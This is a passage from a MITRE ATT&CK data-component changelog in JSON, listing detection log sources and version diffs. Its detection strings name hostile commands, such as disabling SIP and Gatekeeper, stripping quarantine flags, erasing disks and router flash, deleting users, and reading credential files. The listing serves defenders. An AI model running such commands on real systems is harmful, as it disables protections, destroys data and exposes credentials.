                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem:com.apple.Terminal"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "base64 or curl processes chained within short execution window"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Invocation of /usr/bin/defaults write or /usr/bin/plutil modifying plist keys"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "chmod command with arguments including '+s', 'u+s', or numeric values 4000\u20136777"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "command includes dscl . delete or sysadminctl --deleteUser"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DS daemon log entries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "diskutil eraseDisk / asr restore with destructive flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "pfctl -d, socketfilterfw --setglobalstate off, or modifications to com.apple.alf"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "pwpolicy|PasswordPolicy"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Command line contains smbutil view //, mount_smbfs //"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log messages related to disk enumeration context or Terminal session"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "defaults write com.apple.system.logging or logd manipulation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process calling security find-certificate, export, or import"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of log show, fs_usage, or cat targeting system.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of launchctl load/unload/start commands"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "base64 -d or osascript invoked on staged file"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "diskutil partitionDisk or eraseVolume with partition scheme modifications"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "grep/cat on files matching credential patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "diskutil eraseDisk/zeroDisk or asr restore with destructive flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "spctl --master-disable, csrutil disable, or defaults write to disable Gatekeeper"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: at, job runner"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of dscl . create with IsHidden=1"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate 'processImagePath contains \"zip\" OR \"base64\"'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "xattr utility execution with -w or -p flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of 'security', 'cat', or 'grep' commands accessing credential storage"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl load or boot-time plist registration"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dscl -create"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "kextload execution from Terminal or suspicious paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "xattr -d com.apple.quarantine or similar removal commands"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Security framework operations including keychain access, cryptographic operations, and certificate validation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of chflags hidden or setfile -a V"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:spawn, process:exec"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "csrutil disable"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log show --predicate 'process == <utility>'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of launchctl with setenv or bootout targeting TCC.db or AppleScript under Finder context"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "command execution triggered by emond (e.g., shell, curl, python)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Set or unset HIST* variables in shell environment"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "defaults read -g AppleLocale or systemsetup -gettimezone"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl load/unload or plist file modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dscl . -create"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of commands like `ls -l@`, `xattr -l`, or custom tools interacting with resource forks"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of osascript, sh, bash, zsh, installer, open"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application spawns Unix shell process or superuser binary such as sh, su, toybox, toolbox, or shell-like child process with parameters during execution phase"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "CLI command"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Policy Update"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "ip ssh pubkey-chain"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "erase flash:, erase startup-config, format disk"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "CLI command logs"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "cmd: cmd=show clock detail"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of commands to load, copy, or replace system images (e.g., 'copy tftp flash', 'boot system')"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "None"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of commands like 'show running-config', 'copy running-config', or 'export config'"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of CLI commands altering crypto parameters (e.g., 'crypto key generate rsa modulus 512')"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "format flash:, format disk, reformat commands"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "erase flash:, erase nvram:, format disk"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "command logs"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "command logging"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Interface commands"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of privileged commands such as 'copy tftp flash', 'boot system', or 'debug memory'"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of commands disabling crypto hardware acceleration (e.g., 'no crypto engine enable')"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "shell command"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Commands like 'no logging' or equivalents that disable session history"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of commands such as 'copy tftp flash', 'boot system <image>', 'reload'"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "PKI export or certificate manipulation commands"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes referencing 'boot system tftp' or modification of startup-config pointing to external TFTP servers"
                        },
                        {
                            "name": "networkdevice:Firewall",
                            "channel": "Audit trail or CLI/API access indicating commands like no access-list, delete rule-set, clear config"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Command Audit / Configuration Change"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "eventlog"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "command_exec"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "command-exec: CLI commands containing \"show clock\", \"show clock detail\", \"show timezone\" executed by suspicious user/source"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "cmd='show aaa*' OR 'show running-config | include password|aaa' OR 'show aaa common-criteria policy all'"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "CLI command audit"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "system boot logs"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "exec command='monitor capture'"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "no logging buffered, no aaa new-model, disable firewall"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "interactive shell logging"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "command sequence: erase \u2192 format \u2192 reload"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "CLI Command Logging"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "CLI Command Audit"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "command audit"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Privilege-level command execution"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Detected CLI command to export key material"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "reload command issued"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "syslog facility LOCAL7 or trap messages"
                        },
                        {
                            "name": "saas:PRMetadata",
                            "channel": "Commit message or branch name contains encoded strings or payload indicators"
                        },
                        {
                            "name": "vpxd.log",
                            "channel": "VM inventory queries and configuration enumeration through vCenter API calls"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Office-Alerts",
                            "channel": "Unexpected DLL or component loaded at Office startup"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Office-Alerts",
                            "channel": "Office application warning or alert on macro execution from template"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Office/OutlookAddinMonitor",
                            "channel": "Outlook loading add-in via unexpected load path or non-default profile context"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Get-ADTrust|GetAllTrustRelationships"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "EventCode=4103, 4104, 4105, 4106"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Execution of Microsoft script to enumerate custom forms in Outlook mailbox"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "CommandLine=copy-item or robocopy from UNC path"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "PowerShell launched from outlook.exe or triggered without user invocation"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Execution of PowerShell script to enumerate or remove malicious Home Page folder config"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Exchange Cmdlets"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "CmdletName: Get-Recipient, Get-User"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Execution of 'Get-WmiObject Win32_Product' or similar PowerShell cmdlets"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Execution of PowerShell without -NoProfile flag"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "EventCode=4101"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4103, 4104, 4105, 4106"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 19:47:16.123000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"android:logcat\", \"channel\": \"Command 'pm list packages' executed by app sandbox or child proc\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"auditd:EXECVE\", \"channel\": \"execve of script/interpreter (bash, python, node) with suspicious encoded or non-printable content\"}, \"root['x_mitre_log_sources'][21]\": {\"name\": \"auditd:EXECVE\", \"channel\": \"execve of curl,wget,bash,sh,python with piped or remote content\"}, \"root['x_mitre_log_sources'][22]\": {\"name\": \"auditd:EXECVE\", \"channel\": \"execve, kill, ptrace, insmod, rmmod targeting security processes\"}, \"root['x_mitre_log_sources'][103]\": {\"name\": \"esxi:shell\", \"channel\": \"esxcli system syslog config set/reload, services.sh restart/stop\"}, \"root['x_mitre_log_sources'][230]\": {\"name\": \"macos:unifiedlog\", \"channel\": \"Execution of osascript, sh, bash, zsh, installer, open\"}, \"root['x_mitre_log_sources'][231]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase\"}, \"root['x_mitre_log_sources'][232]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application spawns Unix shell process or superuser binary such as sh, su, toybox, toolbox, or shell-like child process with parameters during execution phase\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-20 18:17:23.974000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0018",
                            "external_id": "DC0018"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Host Status",
                    "description": "Logging, messaging, and other artifacts that highlight the health and operational state of host-based security sensors, such as Endpoint Detection and Response (EDR) agents, antivirus software, logging services, and system monitoring tools. Monitoring sensor health is essential for detecting misconfigurations, sensor failures, tampering, or deliberate security control evasion by adversaries.\n\n*Data Collection Measures:*\n\n- Windows Event Logs:\n    - Event ID 1074 (System Shutdown): Detects unexpected system reboots/shutdowns.\n    - Event ID 6006 (Event Log Stopped): Logs when Windows event logging is stopped.\n    - Event ID 16 (Sysmon): Detects configuration state changes that may indicate log tampering.\n    - Event ID 12 (Windows Defender Status Change) \u2013 Detects changes in Windows Defender state.\n- Linux/macOS Monitoring:\n    - `/var/log/syslog`, `/var/log/auth.log`, `/var/log/kern.log`\n    - Journald (journalctl) for kernel and system alerts.\n- Endpoint Detection and Response (EDR) Tools:\n    - Monitor agent health status, detect sensor tampering, and alert on missing telemetry.\n- Mobile Threat Intelligence Logs:\n    - Samsung Knox, SafetyNet, iOS Secure Enclave provide sensor health status for mobile endpoints.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "networkdevice:syslog",
                            "channel": "no logging host, no aaa new-model, no snmp-server, commit"
                        },
                        {
                            "name": "android:appops",
                            "channel": "ACCESS_FINE_LOCATION|NEARBY_DEVICES|BLUETOOTH_SCAN used in close proximity to network-context queries"
                        },
                        {
                            "name": "AndroidAttestation:SafetyNet",
                            "channel": "SafetyNet attestation with CTSProfileMatch=false or BasicIntegrity=false"
                        },
                        {
                            "name": "AndroidAttestation:VerifiedBoot",
                            "channel": "Verified Boot or dm-verity reports partition hash mismatch, non-green boot state, or integrity failure"
                        },
                        {
                            "name": "AndroidLogs:Crash",
                            "channel": "Crash or abnormal restart of privileged system services (for example, system_server, mediaserver, installd) followed shortly by new privileged process activity or binder connections from a single app UID"
                        },
                        {
                            "name": "AndroidLogs:Crash",
                            "channel": "Application or system process crash/restart patterns temporally associated with remote service communications"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "firmware_update, kexec_load"
                        },
                        {
                            "name": "AWS:CloudMetrics",
                            "channel": "Autoscaling, memory/cpu alarms, or instance unhealthiness"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Sustained spike in CPU usage on EC2 instance with web service role"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "StatusCheckFailed or StatusCheckFailed_System for burstable instances (t2/t3)"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Sustained EC2 CPU usage above normal baseline"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "NetworkOut spike beyond baseline"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Sudden spike in network output without a corresponding inbound request ratio"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Unusual CPU burst or metric anomalies"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Powering off or restarting host"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Device risk, compliance, or security posture changes after trusted host pairing or developer-state transition"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "code signature validation failure / exec of invalidly-signed payload from sandboxed app"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Application crash logs, watchdog terminations, or abnormal execution events associated with service communication"
                        },
                        {
                            "name": "journald:boot",
                            "channel": "Secure Boot failure, firmware version change"
                        },
                        {
                            "name": "kubernetes:events",
                            "channel": "CrashLoopBackOff, OOMKilled, container restart count exceeds threshold"
                        },
                        {
                            "name": "linux:procfs",
                            "channel": "Sustained high /proc/[pid]/stat usage"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Out of memory killer invoked or kernel panic entries"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Service stop or disable messages for security tools not reflected in SIEM alerts"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "system is powering down"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "interface_details "
                        },
                        {
                            "name": "macos:syslog",
                            "channel": "Hardware UUID or device list drift"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Web service process (e.g., httpd) entering crash loop or consuming excessive CPU"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Spike in CPU or memory use from non-user-initiated processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Termination or disabling of XProtect, Gatekeeper, or third-party AV daemons"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network stack resource exhaustion, tcp_accept queue overflow, repeated resets"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "EFI firmware integrity check failed"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "System Integrity Protection (SIP) state reported as disabled"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "System shutdown or reboot requested"
                        },
                        {
                            "name": "MDM:DeviceIntegrity",
                            "channel": "jailbreak/root compromise indicators or integrity attestation failures enabling process visibility"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "System reboot scheduled or performed"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP: possible SYN flood or backlog limit exceeded"
                        },
                        {
                            "name": "OEMAttestation:Knox",
                            "channel": "Samsung Knox attestation shows attestation_state=COMPROMISED or warranty bit set"
                        },
                        {
                            "name": "prometheus:metrics",
                            "channel": "Container CPU/Memory usage exceeding threshold"
                        },
                        {
                            "name": "sar:network",
                            "channel": "Outbound network saturation with minimal process activity"
                        },
                        {
                            "name": "Sensor Health",
                            "channel": "None"
                        },
                        {
                            "name": "Windows:perfmon",
                            "channel": "Sustained CPU/memory exhaustion by service process (e.g., w3wp.exe)"
                        },
                        {
                            "name": "Windows:perfmon",
                            "channel": "High sustained CPU usage by a single process"
                        },
                        {
                            "name": "Windows:perfmon",
                            "channel": "Sudden spike in outbound throughput without corresponding inbound traffic"
                        },
                        {
                            "name": "Windows:perfmon",
                            "channel": "Sudden spikes in CPU/Memory usage linked to specific application processes"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-TCPIP",
                            "channel": "Connection queue overflow or failure to allocate TCP state object"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=1166, 7045"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=1074"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=6006"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=16"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "System shutdowns due to bugcheck (Event ID 1001) or watchdog timer expirations"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 18:17:23.974000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"networkdevice:syslog\", \"channel\": \"no logging host, no aaa new-model, no snmp-server, commit\"}, \"root['x_mitre_log_sources'][1]\": {\"name\": \"android:appops\", \"channel\": \"ACCESS_FINE_LOCATION|NEARBY_DEVICES|BLUETOOTH_SCAN used in close proximity to network-context queries\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"AndroidAttestation:SafetyNet\", \"channel\": \"SafetyNet attestation with CTSProfileMatch=false or BasicIntegrity=false\"}, \"root['x_mitre_log_sources'][3]\": {\"name\": \"AndroidAttestation:VerifiedBoot\", \"channel\": \"Verified Boot or dm-verity reports partition hash mismatch, non-green boot state, or integrity failure\"}, \"root['x_mitre_log_sources'][4]\": {\"name\": \"AndroidLogs:Crash\", \"channel\": \"Crash or abnormal restart of privileged system services (for example, system_server, mediaserver, installd) followed shortly by new privileged process activity or binder connections from a single app UID\"}, \"root['x_mitre_log_sources'][5]\": {\"name\": \"AndroidLogs:Crash\", \"channel\": \"Application or system process crash/restart patterns temporally associated with remote service communications\"}, \"root['x_mitre_log_sources'][15]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Device risk, compliance, or security posture changes after trusted host pairing or developer-state transition\"}, \"root['x_mitre_log_sources'][16]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"code signature validation failure / exec of invalidly-signed payload from sandboxed app\"}, \"root['x_mitre_log_sources'][17]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Application crash logs, watchdog terminations, or abnormal execution events associated with service communication\"}, \"root['x_mitre_log_sources'][33]\": {\"name\": \"MDM:DeviceIntegrity\", \"channel\": \"jailbreak/root compromise indicators or integrity attestation failures enabling process visibility\"}, \"root['x_mitre_log_sources'][36]\": {\"name\": \"OEMAttestation:Knox\", \"channel\": \"Samsung Knox attestation shows attestation_state=COMPROMISED or warranty bit set\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-03-13 19:59:42.141000+00:00",
                    "modified": "2026-03-11 15:52:58.538000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0113",
                            "external_id": "DC0113"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Network Communication",
                    "description": "Network Communication captures outbound or inbound communication initiated by an application or mobile device, including the domains contacted, protocols used, and session metadata associated with the communication.\n\nMonitoring network communication enables defenders to identify command-and-control traffic, data exfiltration, or suspicious communication patterns originating from mobile applications.\n\nExamples\n\n- Connections to previously unseen domains\n- Repeated communication with suspicious infrastructure\n- Communication immediately following application installation\n\nCollection Methods\n\n- Mobile VPN telemetry\n- Secure web gateway logs\n- Network detection and response (NDR)\n- Mobile EDR network monitoring\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Application Vetting",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-11 15:52:58.538000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0113\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0113\"}, \"root['description']\": {\"new_value\": \"Network Communication captures outbound or inbound communication initiated by an application or mobile device, including the domains contacted, protocols used, and session metadata associated with the communication.\\n\\nMonitoring network communication enables defenders to identify command-and-control traffic, data exfiltration, or suspicious communication patterns originating from mobile applications.\\n\\nExamples\\n\\n- Connections to previously unseen domains\\n- Repeated communication with suspicious infrastructure\\n- Communication immediately following application installation\\n\\nCollection Methods\\n\\n- Mobile VPN telemetry\\n- Secure web gateway logs\\n- Network detection and response (NDR)\\n- Mobile EDR network monitoring\\n\", \"old_value\": \"Network requests made by an application or domains contacted\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,16 @@\\n-Network requests made by an application or domains contacted\\n+Network Communication captures outbound or inbound communication initiated by an application or mobile device, including the domains contacted, protocols used, and session metadata associated with the communication.\\n+\\n+Monitoring network communication enables defenders to identify command-and-control traffic, data exfiltration, or suspicious communication patterns originating from mobile applications.\\n+\\n+Examples\\n+\\n+- Connections to previously unseen domains\\n+- Repeated communication with suspicious infrastructure\\n+- Communication immediately following application installation\\n+\\n+Collection Methods\\n+\\n+- Mobile VPN telemetry\\n+- Secure web gateway logs\\n+- Network detection and response (NDR)\\n+- Mobile EDR network monitoring\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to70__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to70__0\"><a href=\"#difflib_chg_to70__top\">t</a></td><td class=\"diff_header\" id=\"from70_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Network&nbsp;requests&nbsp;made&nbsp;by&nbsp;an&nbsp;application&nbsp;or&nbsp;domains&nbsp;contacted</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to70__top\">t</a></td><td class=\"diff_header\" id=\"to70_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Network&nbsp;Communication&nbsp;captures&nbsp;outbound&nbsp;or&nbsp;inbound&nbsp;communica</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion&nbsp;initiated&nbsp;by&nbsp;an&nbsp;application&nbsp;or&nbsp;mobile&nbsp;device,&nbsp;including</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;the&nbsp;domains&nbsp;contacted,&nbsp;protocols&nbsp;used,&nbsp;and&nbsp;session&nbsp;metadata</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;associated&nbsp;with&nbsp;the&nbsp;communication.&nbsp;&nbsp;Monitoring&nbsp;network&nbsp;comm</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">unication&nbsp;enables&nbsp;defenders&nbsp;to&nbsp;identify&nbsp;command-and-control&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">traffic,&nbsp;data&nbsp;exfiltration,&nbsp;or&nbsp;suspicious&nbsp;communication&nbsp;patt</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">erns&nbsp;originating&nbsp;from&nbsp;mobile&nbsp;applications.&nbsp;&nbsp;Examples&nbsp;&nbsp;-&nbsp;Conn</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ections&nbsp;to&nbsp;previously&nbsp;unseen&nbsp;domains&nbsp;-&nbsp;Repeated&nbsp;communicatio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;with&nbsp;suspicious&nbsp;infrastructure&nbsp;-&nbsp;Communication&nbsp;immediately</span></td></tr>\n            <tr><td 